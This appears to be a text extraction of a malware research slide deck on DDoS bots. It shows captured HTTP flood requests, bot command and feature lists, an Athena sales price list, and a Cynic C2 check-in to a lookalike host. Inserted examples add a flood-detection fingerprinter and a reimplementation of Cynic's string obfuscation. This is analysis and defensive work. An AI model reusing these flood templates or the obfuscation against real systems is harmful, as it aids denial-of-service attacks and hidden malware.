User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Connection: keep-alive
• .slowloris
– Randomly chooses a Content-Length value between 100000000 and 510065408
– Not a proper Slowloris attack (not slow!)
POST / HTTP/1.1
Host: 68.42.70.60
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5
Content-Length: 429844219
50. Cyclone – DDoS Attack Commands cont.
• .httpget
– Referer is composed of 10 random lowercase letters followed by a randomly selected generic TLD (10 possibilities)
GET / HTTP/1.0
Host: 68.42.70.60
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: z6j4ncowgj.info
• .httpdownload
GET / HTTP/1.0
Host: 68.42.70.60
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Referer: ypoq1xlx2s.rs
51. Cyclone – DDoS Attack Commands cont.
• .httpstrong
– R-U-Dead-Yet (RUDY) attack
– POST data is an endless stream of lowercase letters and digits
POST / HTTP/1.0
Host: 10.1.6.71
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000000
Referer: 7k8qhka5ym.net

eiq48mw17v3mb7...
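Turning the DarkDDoser and Cyclone request templates above to defensive use, an added example (not from the deck) that flags the header-level artifacts the slides show: the build timestamp fused onto DarkDDoser's User-Agent, Cyclone's scheme-less 10-character Referer, its out-of-range Content-Length, and a many-range ARME header. The RANGE_LIMIT threshold, the example.test hosts and the sample requests are constructed.

```python
"""Fingerprints for the HTTP flood templates on the DarkDDoser and Cyclone
slides. Added example for reviewing proxy or IDS captures; not the deck's
code. Thresholds and sample requests are constructed."""
import re

# Artifacts visible in the deck's request dumps:
#  - DarkDDoser Slowloris/ARME: a timestamp fused onto the User-Agent
#  - Cyclone .httpget/.httpdownload/.httpstrong: scheme-less Referer of
#    10 random characters plus a TLD (the slide says letters, its
#    samples also contain digits)
#  - Cyclone .slowloris: Content-Length between 100000000 and 510065408
#  - ARME: a Range header carrying many overlapping byte ranges
UA_FUSED_TS = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")
RANDOM_REFERER = re.compile(r"^[a-z0-9]{10}\.[a-z]{2,}$")
CL_LOW, CL_HIGH = 100000000, 510065408
RANGE_LIMIT = 20  # constructed threshold; tune per site


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def fingerprint(raw):
    """Return the names of the flood signatures a request matches."""
    method, _, h = parse_request(raw)
    hits = []
    if UA_FUSED_TS.search(h.get("user-agent", "")):
        hits.append("darkddoser-ua-timestamp")
    if RANDOM_REFERER.match(h.get("referer", "")):
        hits.append("cyclone-random-referer")
    cl = h.get("content-length", "")
    if method == "POST" and cl.isdigit() and CL_LOW <= int(cl) <= CL_HIGH:
        hits.append("cyclone-fake-slowloris")
    rng = h.get("range", "")
    if rng.startswith("bytes=") and rng.count(",") + 1 > RANGE_LIMIT:
        hits.append("arme-range-abuse")
    return hits


# Constructed samples modelled on the slides; hosts are placeholders.
DARK_SLOWLORIS = (
    "GET / HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) "
    "AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b "
    "Safari/531.21.102011-10-16 20:23:10\r\nAccept: */*;q=0.1\r\n"
    "Connection: Keep-Alive\r\n\r\n")
CYCLONE_SLOWLORIS = (
    "POST / HTTP/1.1\r\nHost: example.test\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4)\r\n"
    "Content-Length: 429844219\r\n\r\n")
CYCLONE_HTTPGET = (
    "GET / HTTP/1.0\r\nHost: example.test\r\nKeep-Alive: 300\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Referer: z6j4ncowgj.info\r\n\r\n")
ARME = ("HEAD / HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-,"
        + ",".join("5-%d" % i for i in range(40)) + "\r\n\r\n")
BENIGN = (
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0\r\n"
    "Referer: https://example.test/\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("dark", DARK_SLOWLORIS), ("cyc-slow", CYCLONE_SLOWLORIS),
                      ("cyc-get", CYCLONE_HTTPGET), ("arme", ARME), ("benign", BENIGN)]:
        print(name, fingerprint(req))
```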
54. Athena
• Started as IRC bot, recently evolved to HTTP
• Consistent updating
• Author contact info:
– Jabber: AthenaIRC@thesecure.biz
– MSN: AthenaIRC@hotmail.com
– ICQ: 618099251
55. Athena Pricing
• 100$ - Solitary bin of Athena built to customer-specified configuration
• 10$ - Rebuild / Update of bin
• 15$ - I will set up your IRC myself so it is most-suitable for Athena on a server of yours through TeamViewer, join.me, PuTTY, etc.
• 130$ - Ready channel spot capable of holding 20k bots and a bin of Athena
-Prices are not permanent and can be subject to change at any point in time
-After purchase, it is up to the buyer to contact either me. I will not chase you down.
-PayPal and Liberty Reserve are accepted.
56. Athena Versions / Builders
• Cracked builders for 1.8.3 and 1.8.7 available
– Version set to Athena=shit!
– Contains string “IPKiller>Athena”
– Versions from 2.1 -> 2.2 -> 2.3 observed in our corral
• Version 2 has more features
• Removes standalone btcwallet command
• Adds filesearch to accomplish that + more
57. Athena Features
• Bitcoin wallet stealing
• File search + upload
• Password stealing
• Visit website
• Download and execute file
• IRC War
• Execute commands
• “Encrypted” IP
• Encrypted commands
66. SATBOT – Stats
• 12 unique executables
• First seen: September 11, 2012
• Last seen: February 11, 2013
• Connections, 1 unique destination (resolved March 14, 2013)
– 216.86.156.135 (ip135.216-86-156.static.steadfastdns.net | ASN 32748 | STEADFAST NETWORKS)
67. SATBOT – Maybe Attribution
• IP is hosting a Website – “Stock Gumshoe: Secret Teaser Stocks Revealed”
– “Feels” shady, but could be a hacked site
68. SATBOT – Identified Commands
• auth - login
• stopddos - stop SYN flood
• info - get system information
• listproc - get process listing
• dir - get directory listing
• prd - setup port redirection
• srd - stop port redirection
• dwn - download and execute
• seeya - remove self
• websrv - start a password protected directory listing web server
• stopweb - stop web server
• terminate - terminate a process
• logout - log out
• spam - spread self via IM
• raw - echo back message
• rnb - change nickname
• syn - launch SYN flood
– Proper SYN flood
70. Aside: SYN Flood “Commands”
• A lot of them tend to be implemented as TCP connection floods
– Easier to use a connect()
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
vs
A --------- SYN ----------> B
A --------- SYN ----------> B
A --------- SYN ----------> B
…
72. Cynic
• Bot coded in C
• Author(s) unknown
• Initially posts a request to /cynic/gate.php
• Appears to be IRC CnC after that*
• Only a handful of samples observed in our corral
73. Cynic String Encoding
• Strings are stored encrypted
• Hard-coded plain-text key
• String byte XOR’d against all key bytes, then logical NOT’d
• Main decryption routine calls decrypt routine with key for all strs
• Strings contained
– Registry keys
– Imports
– Phone home information
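The string scheme described on this slide, implemented as an added example (not the bot's or the deck's code) so the weakness is visible: XORing with every key byte in turn collapses to XORing with one byte, and a single known string recovers that byte. The slide's "logical NOT" is read here as the bitwise x86 NOT; KEY and the sample strings are constructed.

```python
"""Cynic's string protection as the slide describes it: each string byte is
XORed with every byte of the hard-coded plaintext key in turn, then NOTed
(the deck's "logical NOT" is taken as the bitwise x86 NOT; a boolean NOT
would destroy the data). Added example, not the bot's code; KEY and the
sample strings are constructed."""

KEY = b"ExampleKey"  # constructed; the real key is not on the slide


def fold_key(key):
    """XOR of all key bytes. XORing a byte with each key byte in turn is
    the same as XORing it once with this value, so however long the key
    is, the scheme degrades to a single-byte XOR plus NOT."""
    k = 0
    for kb in key:
        k ^= kb
    return k


def cynic_encode(plain, key=KEY):
    """Apply the scheme literally, byte by byte."""
    out = bytearray()
    for b in plain:
        for kb in key:
            b ^= kb
        out.append(~b & 0xFF)
    return bytes(out)


def cynic_decode(blob, key=KEY):
    """Invert it: undo the NOT first, then the XOR chain (self-inverse)."""
    out = bytearray()
    for b in blob:
        b = ~b & 0xFF
        for kb in key:
            b ^= kb
        out.append(b)
    return bytes(out)


def cynic_decode_folded(blob, key=KEY):
    """Same result using the folded single key byte."""
    k = fold_key(key)
    return bytes((~b & 0xFF) ^ k for b in blob)


def recover_key_byte(blob, known_prefix):
    """Known-plaintext shortcut for an analyst: one known string (a
    registry path, an import name) yields the folded key byte without
    locating the key in the binary. Fails if the bytes disagree."""
    candidates = {(~c & 0xFF) ^ p for c, p in zip(blob, known_prefix)}
    if len(candidates) != 1:
        raise ValueError("known prefix does not fit a single-byte key")
    return candidates.pop()


# Constructed samples of the kinds of strings the slide says are protected.
SAMPLES = [b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
           b"InternetOpenUrlA", b"/cynic/gate.php"]

if __name__ == "__main__":
    for s in SAMPLES:
        enc = cynic_encode(s)
        assert cynic_decode(enc) == s == cynic_decode_folded(enc)
        print(enc.hex(), "->", s.decode())
    print("folded key byte: 0x%02x" % fold_key(KEY))
```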
74. Cynic CnC
POST /cynic/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ix.kasprsky.org
Content-Length: 53
Connection: Close

;.......g..........L9:..R....hb.].e....(...(.{T....jb
80. Trends and Takeaways
• Packaging of DDoS attacks in malware
– Either one TCP connection flooder tacked onto a RAT/traditional bot
– Or a package of 20-something flooders for a DDoS-specific bot
• Copy and paste culture
– Hard to classify families
• Coders not paying attention
– Lots of typos and missing pieces
– Broken implementations of attacks
• Too many flood types
– Can be tedious to reverse out the details
82. Trends and Takeaways cont.
• Hash table DoS attacks haven’t really been weaponized at the botnet level yet
– Jeff Edwards of Arbor Networks has talked about similar delays from proof-of-concept to weaponization when Slowloris, ARME, etc. were released
• Obfuscation tends to be XOR, base64, rot13, or zlib based
– Sometimes RC4 – but the plaintext key is readily available
– Everyone will reverse RC4 at least once…
– And gzip…
• C&C via IRC is still common
• Delphi code usually means Russians
• Reversing Visual Basic bots
– Oh god, my eyes!
– Rage quits
85. Trends and Takeaways cont.
• Future research will start focusing more on attribution
– Mandiant APT1 release
• PHP DDoS botnets are hot at the moment
– Triple Crown Attacks on US banks
– Effective, but the scripts themselves and the backend infrastructure seem relatively immature
• DNS Amplification attacks are also hot
– Spamhaus DDoS attacks in late March 2013
• One of the largest seen so far
• Spawned open resolver project
• Attention to “DDoS as a Service” providers will rise
– Krebs on Security DDoS/SWATing attack in March 2013
– Game booters